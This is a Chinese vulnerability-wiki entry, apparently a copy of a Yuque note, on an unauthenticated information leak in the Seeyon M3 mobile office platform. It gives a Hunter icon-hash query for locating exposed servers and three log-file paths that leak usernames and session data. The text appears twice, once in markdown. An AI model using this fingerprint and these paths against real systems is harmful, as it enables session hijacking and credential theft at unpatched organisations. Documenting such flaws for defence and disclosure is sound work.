fofamini-wiki

登录白背景

源码

致远M3 移动智能办公平台存在敏感信息泄露漏洞

一、漏洞简介

致远M3移动办公是致远互联打造的一站式智能工作平台，提供全方位的企业移动业务管理，致力于构建以人为中心的智能化移动应用场景，促进人员工作积极性和创造力，提升企业效率和效能，是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。

二、影响版本

致远M3移动智能办公平台

三、资产测绘

hunterweb.icon=="657d4895205951cbea6396701b194c30"
特征

四、漏洞复现

/mobile_portal/logs/autoLogin.log

/mobile_portal/logs/app.log

/mobile_portal/logs/requset.log

原文: https://www.yuque.com/xiaokp7/ocvun2/wyaciwq5x4ld2fi8

# 致远M3 移动智能办公平台存在敏感信息泄露漏洞

# 一、漏洞简介
致远M3移动办公是致远互联打造的一站式智能工作平台，提供全方位的企业移动业务管理，致力于构建以人为中心的智能化移动应用场景，促进人员工作积极性和创造力，提升企业效率和效能，是为企业量身定制的移动智慧协同平台。 在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。

# 二、影响版本
+ 致远M3移动智能办公平台

# 三、资产测绘
+ hunter`web.icon=="657d4895205951cbea6396701b194c30"`
+ 特征

![1698240642014-afd52241-0325-43d2-a1ab-44cb004c6ec1.png](./img/jU6pk7g3tg1l6b8x/1698240642014-afd52241-0325-43d2-a1ab-44cb004c6ec1-038592.png)

# 四、漏洞复现
```java
/mobile_portal/logs/autoLogin.log
```

![1698240878800-229eeff4-b76c-4714-a994-18503a5eac28.png](./img/jU6pk7g3tg1l6b8x/1698240878800-229eeff4-b76c-4714-a994-18503a5eac28-137452.png)

```java
/mobile_portal/logs/app.log
```

![1698240907019-002b862a-677d-4d01-8b4f-f97907361d4c.png](./img/jU6pk7g3tg1l6b8x/1698240907019-002b862a-677d-4d01-8b4f-f97907361d4c-764327.png)

```java
/mobile_portal/logs/requset.log
```

![1698240974736-ddb5eb48-fdcf-4dc5-8d96-393e2ea98ed8.png](./img/jU6pk7g3tg1l6b8x/1698240974736-ddb5eb48-fdcf-4dc5-8d96-393e2ea98ed8-372795.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wyaciwq5x4ld2fi8>